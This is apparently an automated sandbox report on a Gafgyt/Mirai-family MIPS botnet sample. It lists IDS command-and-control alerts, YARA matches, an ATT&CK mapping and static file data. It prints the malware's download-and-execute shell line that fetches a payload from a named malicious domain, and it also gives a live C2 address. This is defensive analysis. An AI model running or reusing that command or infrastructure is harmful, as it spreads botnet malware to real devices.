Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-05-10T07:44:14.452773+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40804	TCP
2025-05-10T07:44:30.009024+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40806	TCP
2025-05-10T07:44:45.567267+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40808	TCP
2025-05-10T07:45:01.128396+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40810	TCP
2025-05-10T07:45:16.685783+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40812	TCP
2025-05-10T07:45:32.244307+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40814	TCP
2025-05-10T07:45:47.802021+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40816	TCP
2025-05-10T07:46:03.359580+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40818	TCP
2025-05-10T07:46:18.916025+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40820	TCP
2025-05-10T07:46:34.471654+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40822	TCP
2025-05-10T07:46:50.030885+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40824	TCP
2025-05-10T07:47:05.583817+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40826	TCP
2025-05-10T07:47:21.142814+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40828	TCP
2025-05-10T07:47:36.710664+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40830	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: mipsel.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: mipsel.elf	Virustotal: Detection: 65%			Perma Link
Source: mipsel.elf	ReversingLabs: Detection: 62%

Spreading

Opens /proc/net/* files useful for finding connected devices and routers

Source: /tmp/mipsel.elf (PID: 5493)

Opens: /proc/net/route

Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40816
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40810
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40814
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40822
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40828
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40818
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40804
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40806
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40808
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40826
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40830
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40824
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40812
Source: Network traffic	Suricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40820

Source: global traffic

TCP traffic: 192.168.2.14:40804 -> 92.60.77.69:666

Source: /bin/sh (PID: 5510)

Wget executable: /usr/bin/wget -> wget -q http://gay.energy/.../vivid -O .....

Jump to behavior

Source: /usr/bin/wget (PID: 5510)

Reads hosts file: /etc/hosts

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69
Source: unknown	TCP traffic detected without corresponding DNS query: 92.60.77.69

Source: global traffic	DNS traffic detected: DNS query: gay.energy
Source: global traffic	DNS traffic detected: DNS query: daisy.ubuntu.com

System Summary

Malicious sample detected (through community Yara rule)

Source: mipsel.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 5497.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 5499.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 5493.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: mipsel.elf PID: 5493, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: mipsel.elf PID: 5497, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: mipsel.elf PID: 5499, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown

Contains symbols with names commonly found in malware

Source: ELF static info symbol of initial sample

Name: vseattack

Source: mipsel.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 5497.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 5499.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 5493.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: mipsel.elf PID: 5493, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: mipsel.elf PID: 5497, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: mipsel.elf PID: 5499, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16

Source: classification engine

Classification label: mal96.spre.troj.linELF@0/0@6/0

Source: mipsel.elf	ELF static info symbol of initial sample: libc/string/mips/memcpy.S
Source: mipsel.elf	ELF static info symbol of initial sample: libc/string/mips/memset.S
Source: mipsel.elf	ELF static info symbol of initial sample: libc/sysdeps/linux/mips/crt1.S
Source: mipsel.elf	ELF static info symbol of initial sample: libc/sysdeps/linux/mips/crti.S
Source: mipsel.elf	ELF static info symbol of initial sample: libc/sysdeps/linux/mips/crtn.S
Source: mipsel.elf	ELF static info symbol of initial sample: libc/sysdeps/linux/mips/pipe.S
Source: mipsel.elf	ELF static info symbol of initial sample: libc/sysdeps/linux/mips/syscall_error.S
Source: mipsel.elf	ELF static info symbol of initial sample: libc/sysdeps/linux/mips/vfork.S

Source: /usr/bin/wget (PID: 5510)	File: /tmp/.....	Jump to behavior
Source: /bin/sh (PID: 5512)	Directory: /tmp/.....	Jump to behavior
Source: /bin/sh (PID: 5512)	Directory: /tmp/.....	Jump to behavior

Source: /usr/bin/wget (PID: 5510)

Empty hidden file: /tmp/.....

Jump to behavior

Source: /tmp/mipsel.elf (PID: 5495)

Shell command executed: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."

Jump to behavior

Source: /bin/sh (PID: 5511)

Chmod executable: /usr/bin/chmod -> chmod 777 .....

Jump to behavior

Source: /bin/sh (PID: 5514)

Rm executable: /usr/bin/rm -> rm -rf .....

Jump to behavior

Source: /bin/sh (PID: 5510)

Wget executable: /usr/bin/wget -> wget -q http://gay.energy/.../vivid -O .....

Jump to behavior

Source: /usr/bin/chmod (PID: 5511)

File: /tmp/..... (bits: - usr: rwx grp: rwx all: rwx)

Jump to behavior

Source: /bin/sh (PID: 5511)

Chmod executable with 777: /usr/bin/chmod -> chmod 777 .....

Jump to behavior

Source: /tmp/mipsel.elf (PID: 5493)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/wget (PID: 5510)	Queries kernel information via 'uname':			Jump to behavior

Source: mipsel.elf, 5493.1.000055c80d9f4000.000055c80da7b000.rw-.sdmp, mipsel.elf, 5497.1.000055c80d9f4000.000055c80da7b000.rw-.sdmp, mipsel.elf, 5499.1.000055c80d9f4000.000055c80da7b000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mipsel
Source: mipsel.elf, 5493.1.000055c80d9f4000.000055c80da7b000.rw-.sdmp, mipsel.elf, 5497.1.000055c80d9f4000.000055c80da7b000.rw-.sdmp, mipsel.elf, 5499.1.000055c80d9f4000.000055c80da7b000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/mipsel
Source: mipsel.elf, 5493.1.00007ffd93ad9000.00007ffd93afa000.rw-.sdmp, mipsel.elf, 5497.1.00007ffd93ad9000.00007ffd93afa000.rw-.sdmp, mipsel.elf, 5499.1.00007ffd93ad9000.00007ffd93afa000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/mipsel.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mipsel.elf
Source: mipsel.elf, 5493.1.00007ffd93ad9000.00007ffd93afa000.rw-.sdmp, mipsel.elf, 5497.1.00007ffd93ad9000.00007ffd93afa000.rw-.sdmp, mipsel.elf, 5499.1.00007ffd93ad9000.00007ffd93afa000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsel

Stealing of Sensitive Information

Yara detected Gafgyt

Source: Yara match

File source: mipsel.elf, type: SAMPLE

Yara detected Mirai

Source: Yara match	File source: mipsel.elf, type: SAMPLE
Source: Yara match	File source: 5497.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5499.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5493.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mipsel.elf PID: 5493, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mipsel.elf PID: 5497, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mipsel.elf PID: 5499, type: MEMORYSTR

Source: Initial sample	User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
Source: Initial sample	User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
Source: Initial sample	User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
Source: Initial sample	User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
Source: Initial sample	User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Source: Initial sample	User agent string found: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Source: Initial sample	User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
Source: Initial sample	User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: Initial sample	User agent string found: Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
Source: Initial sample	User agent string found: Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
Source: Initial sample	User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Source: Initial sample	User agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
Source: Initial sample	User agent string found: Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Source: Initial sample	User agent string found: Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Source: Initial sample	User agent string found: Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
Source: Initial sample	User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Source: Initial sample	User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Source: Initial sample	User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Source: Initial sample	User agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0

Remote Access Functionality

Yara detected Gafgyt

Source: Yara match

File source: mipsel.elf, type: SAMPLE

Yara detected Mirai

Source: Yara match	File source: mipsel.elf, type: SAMPLE
Source: Yara match	File source: 5497.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5499.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5493.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mipsel.elf PID: 5493, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mipsel.elf PID: 5497, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mipsel.elf PID: 5499, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	Path Interception	1 Hide Artifacts	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Data Obfuscation	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	2 File and Directory Permissions Modification	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Hidden Files and Directories	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File Deletion	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
mipsel.elf	65%	Virustotal		Browse
mipsel.elf	63%	ReversingLabs	Linux.Backdoor.Gafgyt
mipsel.elf	100%	Avira	LINUX/Mirai.Gafgyt.

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
daisy.ubuntu.com	162.213.35.25	true	false		high
gay.energy	unknown	unknown	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
92.60.77.69	unknown	Italy		5602	AS-IRIDEOS-KPIT	true

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
daisy.ubuntu.com	arm5.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	arm6.elf	Get hash	malicious	Gafgyt	Browse	162.213.35.24
	rep.arc.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	arm6.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	Space.arm5.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	Space.spc.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	O4WmcV1laq.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	onNhrf5u66.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	NkUW8QQONi.elf	Get hash	malicious	BPFDoor	Browse	162.213.35.24
	7T1E6ZHN3w.elf	Get hash	malicious	Unknown	Browse	162.213.35.24

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-IRIDEOS-KPIT	armv4l.elf	Get hash	malicious	Unknown	Browse	193.28.95.59
	nullnet_load.arm7.elf	Get hash	malicious	Mirai	Browse	109.233.129.42
	8427xbk3Zt.elf	Get hash	malicious	Unknown	Browse	109.233.130.43

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
Entropy (8bit):	5.364281562076639
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	mipsel.elf
File size:	171'453 bytes
MD5:	42df0be80d2c8672b1f3f98383648b9b
SHA1:	a6aa14c2b6b56e854de2828853ff44ef511ca246
SHA256:	97bb2f637b0b13cc8a54e00a360eba90029d90b28dcdaeeab86b5df673293593
SHA512:	d6d70264d945825fb27fd46eab1eb63b1a53db66ca04ce6f195fd95897858c95c6d8eea53548dd7a26564a108d077e46e75eec732e96b979c72329d6487a9af0
SSDEEP:	1536:H3ZG4ejPnK3c+oT/rrVFwvmwpLBMdH4p4NHAg8L59/Kq0KLI+tCDvsEjm8iyh8de:UlMbpR4eCD0om8Hh8d75Nu
TLSH:	13F39636A7614DB7D81ECD7301AA85121C8CD98712D82B6FB274E61CEB6BD4F05E3D48
File Content Preview:	.ELF......................@.4....>......4. ...(........p......@...@...........................@...@.@...@...............@...@.F.@.F.....xq..........Q.td................................................p.F....<...'!......'.......................<...'!......

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x4002b0
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	4
Section Header Offset:	146944
Section Header Size:	40
Number of Section Headers:	22
Header String Table Index:	19

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Info	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0	0
.reginfo	MIPS_REGINFO	0x4000b4	0xb4	0x18	0x18	0x2	A	0	0	4
.init	PROGBITS	0x4000cc	0xcc	0x8c	0x0	0x6	AX	0	0	4
.text	PROGBITS	0x400160	0x160	0x1b670	0x0	0x6	AX	0	0	16
.fini	PROGBITS	0x41b7d0	0x1b7d0	0x5c	0x0	0x6	AX	0	0	4
.rodata	PROGBITS	0x41b830	0x1b830	0x4a10	0x0	0x2	A	0	0	16
.eh_frame	PROGBITS	0x460240	0x20240	0x4	0x0	0x3	WA	0	0	4
.ctors	PROGBITS	0x460244	0x20244	0x8	0x0	0x3	WA	0	0	4
.dtors	PROGBITS	0x46024c	0x2024c	0x8	0x0	0x3	WA	0	0	4
.jcr	PROGBITS	0x460254	0x20254	0x4	0x0	0x3	WA	0	0	4
.data.rel.ro	PROGBITS	0x460258	0x20258	0x4c	0x0	0x3	WA	0	0	4
.data	PROGBITS	0x4602b0	0x202b0	0x3d0	0x0	0x3	WA	0	0	16
.got	PROGBITS	0x460680	0x20680	0x55c	0x4	0x10000003	WAp	0	0	16
.sdata	PROGBITS	0x460bdc	0x20bdc	0x4	0x0	0x10000003	WAp	0	0	4
.sbss	NOBITS	0x460be0	0x20be0	0x30	0x0	0x10000003	WAp	0	0	4
.bss	NOBITS	0x460c10	0x20be0	0x67a8	0x0	0x3	WA	0	0	16
.comment	PROGBITS	0x0	0x20be0	0xcba	0x0	0x0		0	0	1
.mdebug.abi32	PROGBITS	0xcba	0x2189a	0x0	0x0	0x0		0	0	1
.pdr	PROGBITS	0x0	0x2189c	0x24c0	0x0	0x0		0	0	4
.shstrtab	STRTAB	0x0	0x23d5c	0xa1	0x0	0x0		0	0	1
.symtab	SYMTAB	0x0	0x24170	0x34f0	0x10	0x0		21	352	4
.strtab	STRTAB	0x0	0x27660	0x275d	0x0	0x0		0	0	1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
<unknown>	0xb4	0x4000b4	0x4000b4	0x18	0x18	0.9834	0x4	R	0x4	.reginfo
